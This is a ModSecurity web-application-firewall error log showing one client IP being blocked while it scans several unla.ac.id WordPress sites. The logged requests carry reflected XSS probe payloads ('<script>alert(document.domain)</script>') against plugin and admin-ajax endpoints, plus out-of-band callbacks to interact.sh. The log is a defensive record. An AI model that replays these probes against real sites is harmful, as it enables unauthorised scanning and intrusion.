[Tue Aug 29 11:57:05.639217 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAnEqWcAAAAO"]
[Tue Aug 29 11:57:05.687087 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAm80T0AAAAF"]
[Tue Aug 29 11:57:06.655022 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16osCo-f0AAAnEqXEAAAAO"]
[Tue Aug 29 11:57:07.558223 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AIAAAAV"]
[Tue Aug 29 11:57:07.608165 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AQAAAAV"]
[Tue Aug 29 11:57:07.623844 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAqqtqQAAAAA"]
[Tue Aug 29 11:57:07.632880 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAoz8YwAAAAS"]
[Tue Aug 29 11:57:07.657733 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArbWUgAAAAG"]
[Tue Aug 29 11:57:07.674396 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAqqtqYAAAAA"]
[Tue Aug 29 11:57:07.675404 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AcAAAAV"]
[Tue Aug 29 11:57:07.677174 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAoz8Y4AAAAS"]
[Tue Aug 29 11:57:07.760897 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AgAAAAV"]
[Tue Aug 29 11:57:07.762784 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAoz8Y8AAAAS"]
[Tue Aug 29 11:57:08.561809 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq-HpsAAAAT"]
[Tue Aug 29 11:57:08.608195 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq-HpwAAAAT"]
[Tue Aug 29 11:57:08.649064 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq-Hp4AAAAT"]
[Tue Aug 29 11:57:08.669065 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq-Hp8AAAAT"]
[Tue Aug 29 11:57:08.690122 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq-HqAAAAAT"]
[Tue Aug 29 11:57:08.692686 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArbWVIAAAAG"]
[Tue Aug 29 11:57:08.705991 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArB2BQAAAAV"]
[Tue Aug 29 11:57:08.747517 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArbWVQAAAAG"]
[Tue Aug 29 11:57:08.759139 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAAq-HqMAAAAT"]
[Tue Aug 29 11:57:08.767696 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16pMCo-f0AAArbWVUAAAAG"]
